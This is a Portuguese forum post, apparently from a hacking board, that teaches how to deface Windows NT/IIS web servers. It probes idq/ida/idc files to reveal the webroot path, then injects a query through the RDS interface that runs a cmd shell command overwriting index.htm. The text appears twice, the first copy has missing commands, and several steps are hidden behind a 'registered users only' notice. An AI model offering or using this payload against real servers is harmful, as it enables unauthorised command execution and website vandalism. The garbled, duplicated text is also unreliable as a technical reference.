Introducão
Antes de tudo quero avisar que esta técnica só funciona se o servidor usar Windows NT, este tutorial e redirecionado aos que tem conhecimentos intemediarios e toda a autoria dele e minha.
Tutorial
Primeiramente vamos procurar a página que se encontra a index ou a default, na maioria dos casos só precisa digitar:
Que aparece o diretorio, o mais comum é o InetPubwwwroot.
Agora vamos descobrir se o servidor usa index.asp, index.html ou index.htm, isso conta também se for default.
Para isso digite na URL:
Você vai encontrar o diretorio como dito anteriormente, agora vamos a descoberta proposta acima.
Você só encontra ela fazendo testes assim:
Vamos supor que o diretório é c:inetpubwwwrootindex.htm, então é so entrar na tela do RDS assim:
Apague tudo que estiver escrito e digite:
Agora é so apertar RUN que o servidor estará invadido.
Créditos: 'G33K~
Antes de tudo quero avisar que esta técnica só funciona se o servidor usar Windows NT, este tutorial e redirecionado aos que tem conhecimentos intemediarios e toda a autoria dele e minha.
Tutorial
Primeiramente vamos procurar a página que se encontra a index ou a default, na maioria dos casos só precisa digitar:
wwww.servidor.com/idq.idq
Agora vamos descobrir se o servidor usa index.asp, index.html ou index.htm, isso conta também se for default.
Para isso digite na URL:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
ou
ida.ida
ou
idc.idc
ou
ida.ida
ou
idc.idc
Você só encontra ela fazendo testes assim:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... possiveis
ou
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... possiveis
ou
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... possiveis
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Select * from Products where ProductType='|shell("cmd /c echo (O QUE QUER QUE APAREÇA NO SEU HACKED) > c:InetPubwwwrootindex.htm")|'
Créditos: 'G33K~
Comment